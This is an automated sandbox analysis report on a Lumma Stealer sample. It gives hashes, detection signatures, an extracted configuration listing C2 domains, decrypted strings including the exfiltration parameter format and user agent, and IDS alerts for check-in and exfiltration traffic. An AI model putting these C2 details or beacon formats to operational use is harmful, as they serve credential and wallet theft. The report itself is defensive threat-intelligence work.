Edit tour

Windows Analysis Report
SOElePqvtf.exe

Overview

General Information

Sample name:	SOElePqvtf.exe renamed because original name is a hash value
Original sample name:	b2981d605f25a4617f31b78996de3f78.exe
Analysis ID:	1584185
MD5:	b2981d605f25a4617f31b78996de3f78
SHA1:	2856e6b67e7caa70a9157c54a714d9bcc09c14d1
SHA256:	9b88b91290402bb3639d348c0481c5989ef9624147346b568b83095b76a5ed20
Tags:	exeuser-abuse_ch
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

LummaC encrypted strings found

Machine Learning detection for sample

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

SOElePqvtf.exe (PID: 7336 cmdline: "C:\Users\user\Desktop\SOElePqvtf.exe" MD5: B2981D605F25A4617F31B78996DE3F78)

WerFault.exe (PID: 7552 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7336 -s 1816 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["cloudewahsj.shop", "wholersorie.shop", "tirepublicerj.shop", "nearycrepso.shop", "abruptyopsn.shop", "framekgirus.shop", "noisycuttej.shop", "rabidcowse.shop"], "Build id": "4h5VfH--"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1585486653.000000000064C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1585816079.0000000002100000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.1585442672.0000000000510000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
Process Memory Space: SOElePqvtf.exe PID: 7336	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: SOElePqvtf.exe PID: 7336	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: SOElePqvtf.exe PID: 7336	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 2 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-04T15:33:17.245214+0100	2028371	3	Unknown Traffic	192.168.2.7	49710	104.21.64.1	443	TCP
2025-01-04T15:33:18.940442+0100	2028371	3	Unknown Traffic	192.168.2.7	49721	104.21.64.1	443	TCP
2025-01-04T15:33:20.402724+0100	2028371	3	Unknown Traffic	192.168.2.7	49732	104.21.64.1	443	TCP
2025-01-04T15:33:21.556667+0100	2028371	3	Unknown Traffic	192.168.2.7	49738	104.21.64.1	443	TCP
2025-01-04T15:33:23.166290+0100	2028371	3	Unknown Traffic	192.168.2.7	49752	104.21.64.1	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-04T15:33:18.417446+0100	2054653	1	A Network Trojan was detected	192.168.2.7	49710	104.21.64.1	443	TCP
2025-01-04T15:33:19.427444+0100	2054653	1	A Network Trojan was detected	192.168.2.7	49721	104.21.64.1	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-04T15:33:18.417446+0100	2049836	1	A Network Trojan was detected	192.168.2.7	49710	104.21.64.1	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-04T15:33:19.427444+0100	2049812	1	A Network Trojan was detected	192.168.2.7	49721	104.21.64.1	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-04T15:33:17.245214+0100	2058607	1	Domain Observed Used for C2 Detected	192.168.2.7	49710	104.21.64.1	443	TCP
2025-01-04T15:33:18.940442+0100	2058607	1	Domain Observed Used for C2 Detected	192.168.2.7	49721	104.21.64.1	443	TCP
2025-01-04T15:33:20.402724+0100	2058607	1	Domain Observed Used for C2 Detected	192.168.2.7	49732	104.21.64.1	443	TCP
2025-01-04T15:33:21.556667+0100	2058607	1	Domain Observed Used for C2 Detected	192.168.2.7	49738	104.21.64.1	443	TCP
2025-01-04T15:33:23.166290+0100	2058607	1	Domain Observed Used for C2 Detected	192.168.2.7	49752	104.21.64.1	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cloudewahsj .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-04T15:33:16.721080+0100	2058606	1	Domain Observed Used for C2 Detected	192.168.2.7	49526	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-04T15:33:20.989285+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.7	49732	104.21.64.1	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: SOElePqvtf.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://cloudewahsj.shop/d	Avira URL Cloud: Label: malware
Source: https://cloudewahsj.shop/api21	Avira URL Cloud: Label: malware
Source: https://cloudewahsj.shop//	Avira URL Cloud: Label: malware
Source: https://cloudewahsj.shop/api	Avira URL Cloud: Label: malware
Source: https://cloudewahsj.shop/apie	Avira URL Cloud: Label: malware
Source: https://cloudewahsj.shop/api-	Avira URL Cloud: Label: malware
Source: https://cloudewahsj.shop/api~:b	Avira URL Cloud: Label: malware
Source: https://cloudewahsj.shop/	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0.2.SOElePqvtf.exe.400000.0.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["cloudewahsj.shop", "wholersorie.shop", "tirepublicerj.shop", "nearycrepso.shop", "abruptyopsn.shop", "framekgirus.shop", "noisycuttej.shop", "rabidcowse.shop"], "Build id": "4h5VfH--"}

Multi AV Scanner detection for submitted file

Source: SOElePqvtf.exe	Virustotal: Detection: 37%			Perma Link
Source: SOElePqvtf.exe	ReversingLabs: Detection: 44%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: SOElePqvtf.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000003.1357707332.0000000002160000.00000004.00001000.00020000.00000000.sdmp	String decryptor: cloudewahsj.shop
Source: 00000000.00000003.1357707332.0000000002160000.00000004.00001000.00020000.00000000.sdmp	String decryptor: rabidcowse.shop
Source: 00000000.00000003.1357707332.0000000002160000.00000004.00001000.00020000.00000000.sdmp	String decryptor: noisycuttej.shop
Source: 00000000.00000003.1357707332.0000000002160000.00000004.00001000.00020000.00000000.sdmp	String decryptor: tirepublicerj.shop
Source: 00000000.00000003.1357707332.0000000002160000.00000004.00001000.00020000.00000000.sdmp	String decryptor: framekgirus.shop
Source: 00000000.00000003.1357707332.0000000002160000.00000004.00001000.00020000.00000000.sdmp	String decryptor: wholersorie.shop
Source: 00000000.00000003.1357707332.0000000002160000.00000004.00001000.00020000.00000000.sdmp	String decryptor: abruptyopsn.shop
Source: 00000000.00000003.1357707332.0000000002160000.00000004.00001000.00020000.00000000.sdmp	String decryptor: nearycrepso.shop
Source: 00000000.00000003.1357707332.0000000002160000.00000004.00001000.00020000.00000000.sdmp	String decryptor: cloudewahsj.shop
Source: 00000000.00000003.1357707332.0000000002160000.00000004.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000003.1357707332.0000000002160000.00000004.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000003.1357707332.0000000002160000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000003.1357707332.0000000002160000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000003.1357707332.0000000002160000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000003.1357707332.0000000002160000.00000004.00001000.00020000.00000000.sdmp	String decryptor: 4h5VfH--

Source: C:\Users\user\Desktop\SOElePqvtf.exe

Code function: 0_2_00415D89 CryptUnprotectData,

0_2_00415D89

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\SOElePqvtf.exe

Unpacked PE file: 0.2.SOElePqvtf.exe.400000.0.unpack

Source: SOElePqvtf.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\SOElePqvtf.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49752 version: TLS 1.2

Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+01h]	0_2_00441816
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then mov eax, esi	0_2_0043D0D0
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-533305EEh]	0_2_0043D0D0
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+34h]	0_2_0040C080
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00422370
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then mov word ptr [edx], cx	0_2_00418BA2
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-1CAAACA4h]	0_2_00417054
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+7E534795h]	0_2_0041B021
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_0041B021
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+edi+02h]	0_2_004438E0
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+edi+02h]	0_2_004438F9
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+edi+02h]	0_2_004438FB
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+482C66D0h]	0_2_00422880
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then movzx ebx, bx	0_2_00427885
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+edx]	0_2_0041F170
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then mov dword ptr [ebp-2Ch], eax	0_2_004421E9
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then mov byte ptr [edi+10h], 00000000h	0_2_004421E9
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then movzx ebx, byte ptr [esi]	0_2_0041618C
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then cmp word ptr [esi+eax+02h], 0000h	0_2_0041BA52
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then mov esi, ecx	0_2_0041BA52
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_0041BA52
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then mov dword ptr [esi], FFFFFFFFh	0_2_00402210
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_0043A230
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then movzx edx, word ptr [eax]	0_2_004442E0
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_00431AF5
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ebx+0Bh]	0_2_0040B280
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h	0_2_00440A90
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+01h]	0_2_00441B50
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then mov byte ptr [edi], bl	0_2_00409360
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then mov byte ptr [edi], cl	0_2_0042FB7D
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then movzx eax, byte ptr [ecx+edi]	0_2_00408320
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	0_2_00419B30
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	0_2_0041F3E0
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then mov byte ptr [esi], al	0_2_0041B3F2
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then mov ecx, eax	0_2_0041AB90
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then jmp ecx	0_2_00428C62
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then mov ecx, eax	0_2_00427C10
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 4B884A2Eh	0_2_00444C20
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-000000D1h]	0_2_00414C30
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then mov ecx, eax	0_2_00418492
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then movzx edx, word ptr [ebx]	0_2_0043CD40
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_2_0042C5E0
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then mov byte ptr [esi], al	0_2_0041B58F
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	0_2_004195B6
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	0_2_004195B6
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then mov edi, edx	0_2_0043E6E0
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then movzx eax, word ptr [edx]	0_2_0043E6E0
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then mov ecx, edx	0_2_00430F4E
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then mov ecx, edx	0_2_00430F54
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then mov word ptr [ebx], ax	0_2_0041A770
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then mov ecx, edx	0_2_00430F03
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then mov byte ptr [edi], cl	0_2_0042F716
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	0_2_00407730
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	0_2_00407730
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then movzx eax, byte ptr [esp+edx+7C605D08h]	0_2_00427FC0
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax-209D22B7h]	0_2_00427FC0
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+edi+02h]	0_2_004437D0
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+04h]	0_2_0042A7F0
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then mov edx, ecx	0_2_0042A7F0
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then mov ecx, eax	0_2_00427FFD
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then mov edx, ecx	0_2_0042AF92
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_0042AF92
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then mov edx, ecx	0_2_0042AFB0
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then mov word ptr [edx], cx	0_2_0211921E
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-000000D1h]	0_2_02115202
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_0212B247
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then mov ecx, eax	0_2_02128264
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then movzx eax, byte ptr [esp+edx+7C605D08h]	0_2_0212829E
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+7E534795h]	0_2_0211B288
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_0211B288
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-1CAAACA4h]	0_2_021172BB
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+34h]	0_2_0210C2E7
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then mov eax, esi	0_2_0213D337
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-533305EEh]	0_2_0213D337
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+edx]	0_2_0211F3D7
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then mov ecx, edx	0_2_0213116A
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then mov ecx, edx	0_2_021311B5
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then mov ecx, edx	0_2_021311BB
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then mov byte ptr [esi], al	0_2_0211B659
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	0_2_0211F647
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax-209D22B7h]	0_2_02128677
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then cmp al, 20h	0_2_0210275E
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then mov byte ptr [esi], al	0_2_0211B7F6
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then mov dword ptr [ebp-2Ch], eax	0_2_02142450
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then mov byte ptr [edi+10h], 00000000h	0_2_02142450
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then mov dword ptr [esi], FFFFFFFFh	0_2_02102477
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_0213A497
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ebx+0Bh]	0_2_0210B4E7
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then mov edi, dword ptr [esp+18h]	0_2_02115527
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then movzx edx, word ptr [eax]	0_2_02144547
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then movzx eax, byte ptr [ecx+edi]	0_2_02108587
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_021225D7
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then mov byte ptr [edi], bl	0_2_021095C7
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then mov edi, edx	0_2_0213EA3F
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+482C66D0h]	0_2_02122AE7
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then movzx ebx, bx	0_2_02127B02
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then movzx eax, word ptr [edx]	0_2_0213EB27
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	0_2_0211981D
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	0_2_0211981D
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_2_0212C847
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then mov ecx, eax	0_2_0211886C
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then mov byte ptr [edi], cl	0_2_0212F97D
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	0_2_02107997
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	0_2_02107997
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then mov word ptr [ebx], ax	0_2_0211A9D7
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then mov ecx, eax	0_2_02127E77
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 4B884A2Eh	0_2_02144E87
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then jmp ecx	0_2_02128EB2
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then mov edx, ecx	0_2_0212AF50
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then movzx edx, word ptr [ebx]	0_2_0213CFA7
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+04h]	0_2_0212AC89
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then cmp word ptr [esi+eax+02h], 0000h	0_2_0211BCB9
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then mov esi, ecx	0_2_0211BCB9
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_0211BCB9
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h	0_2_02140CF7
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then mov ecx, eax	0_2_0211ADF7
Source: C:\Users\user\Desktop\SOElePqvtf.exe	Code function: 4x nop then mov byte ptr [edi], cl	0_2_0212FDE4

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2058606 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cloudewahsj .shop) : 192.168.2.7:49526 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058607 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI) : 192.168.2.7:49710 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2058607 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI) : 192.168.2.7:49721 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2058607 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI) : 192.168.2.7:49738 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2058607 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI) : 192.168.2.7:49732 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2058607 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI) : 192.168.2.7:49752 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49710 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49710 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49721 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49721 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49732 -> 104.21.64.1:443

C2 URLs / IPs found in malware configuration

